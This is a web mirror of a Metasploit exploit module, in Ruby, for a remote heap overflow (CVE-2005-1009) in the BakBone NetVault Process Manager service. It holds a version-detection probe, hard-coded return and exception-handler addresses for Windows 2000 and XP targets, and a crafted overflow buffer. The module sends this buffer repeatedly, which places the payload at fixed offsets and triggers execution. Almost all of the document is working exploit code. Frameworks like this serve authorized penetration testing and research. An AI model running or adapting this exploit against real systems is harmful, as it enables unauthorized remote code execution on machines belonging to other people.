CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/bakbone_netvault_heap.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'BakBone NetVault Remote Heap Overflow',

14
      'Description'    => %q{

15
    This module exploits a heap overflow in the BakBone NetVault

16
  Process Manager service. This code is a direct port of the netvault.c

17
  code written by nolimit and BuzzDee.

18
      },

19
      'Author'         => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],

20
      'References'     =>

21
        [

22
          ['CVE', '2005-1009'],

23
          ['OSVDB', '15234'],

24
          ['BID', '12967'],

25
        ],

26
      'Payload'        =>

27
        {

28
          'Space'    => 1024,

29
          'BadChars' => "\x00\x20",

30
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",

31
        },

32
      'Platform'       => 'win',

33
      'Targets'        =>

34
        [

35
          ['Windows 2000 SP4 English',   { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],

36
          ['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],

37
        ],

38


39
      'Privileged'     => false,

40
      'DisclosureDate' => '2005-04-01'

41
      ))

42


43
      register_options(

44
      [

45
        Opt::RPORT(20031)

46
      ])

47
  end

48


49
  def check

50
    connect

51


52
    hname = "METASPLOIT"

53
    probe =

54
      "\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +

55
      "\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +

56
      "\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +

57
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" +

58
      "\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" +

59
      [ hname.length + 1 ].pack('V') + hname + "\x00"

60
    probe += "\x00" * (201 - probe.length)

61


62
    sock.put(probe)

63
    res = sock.get_once(1, 10)

64


65
    off = (res || '').index("NVBuild")

66


67
    if off

68
      off += 21

69
      ver  = res[off + 4, res[off, 4].unpack('V')[0]].to_i

70


71
      if ver > 0

72
        print_status("Detected NetVault Build #{ver}")

73
        return Exploit::CheckCode::Appears

74
      end

75
    end

76


77
    return Exploit::CheckCode::Safe

78
  end

79


80
  def exploit

81
    print_status("Trying target #{target.name}...")

82


83
    head =

84
      "\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +

85
      "\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +

86
      "\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +

87
      "\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x10" +

88
      "\x02\x4e\x3f\xac\x14\xcc\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

89
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" +

90
      "\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00" +

91
      "\x00\x10\x02\x4e\x3f\xc0\xa8\xea\xeb\x00\x00\x00\x00\x00\x00\x00" +

92
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

93
      "\x00\x01\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20" +

94
      "\x00\x00\x00\x10\x02\x4e\x3f\xc2\x97\x2c\xd3\x00\x00\x00\x00\x00" +

95
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

96
      "\x00\x00\x00\xb9\xf9\xa2\xc8\x02\x02\x00\x00\x00\xa5\x97\xf0\xca" +

97
      "\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x04\x02\x4e" +

98
      "\x3f\xac\x14\xcc\x0a\xb0\xfc\xe2\x00\x00\x00\x00\x00\xec\xfa\x8e" +

99
      "\x01\xa4\x6b\x41\x00\xe4\xfa\x8e\x01\xff\xff\xff\xff\x01\x02"

100


101
    pattern = make_nops(39947) + "\x00\x00\x00"

102
    p       = payload.encoded

103


104
    pattern[0, head.length]  = head

105
    pattern[32790, 2]        = "\xeb\x0a"

106
    pattern[32792, 4]        = [ target.ret ].pack('V')

107
    pattern[32796, 4]        = [ target['UEF'] ].pack('V')

108
    pattern[32800, p.length] = p

109


110
    sent = 0

111
    try  = 0

112


113
    15.times {

114
      try += 1

115
      connect

116
      sent = sock.put(pattern)

117
      disconnect

118
      break if sent == pattern.length

119
    }

120


121
    if (try == 15)

122
      print_error("Could not write full packet to server.")

123
      return

124
    end

125


126
    print_status("Overflow request sent, sleeping fo four seconds (#{try} tries)")

127
    select(nil,nil,nil,4)

128


129
    print_status("Attempting to trigger memory overwrite by reconnecting...")

130


131
    begin

132
      10.times { |x|

133
        connect

134
        sock.put(pattern)

135
        print_status("   Completed connection #{x}")

136
        sock.get_once(1, 1)

137
        disconnect

138
      }

139
    rescue

140
    end

141


142
    print_status("Waiting for payload to execute...")

143


144
    handler

145
    disconnect

146
  end

147


148
  def wfs_delay

149
    5

150
  end

151
end

152


153